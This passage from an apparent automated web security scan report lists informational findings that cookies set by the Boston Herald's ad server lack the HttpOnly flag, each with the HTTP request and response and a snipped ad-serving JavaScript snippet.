User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:04 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.518. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
    OAX
    NSC_d12efm_qppm_iuuq
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.519. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.520. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.521. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
    OAX
    NSC_d12efm_qppm_iuuq
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.522. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/811190172/x14/BostonHerald/DisneyContest2011_BHHP_234x60/DCL_234_60.jpg/726348
...[SNIP]...

11.523. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=x15&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:57 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/864039057/x15/BostonHerald/HerbChambers_234x60/herbChambers234x60a.gif/7263485
...[SNIP]...

11.524. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=x16&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 415
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/932976519/x16/BostonHerald/FridayThrowdown_234x60/FridayThrowdown0610_234x60.j
...[SNIP]...

11.525. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
    RMFD
    NSC_d12efm_qppm_iuuq
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011Pizw3O101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

11.526. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8gACNo5; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.527. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.528. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.529. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...

11.530. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __qca=P0-1247593866-1296251843767

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.531. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
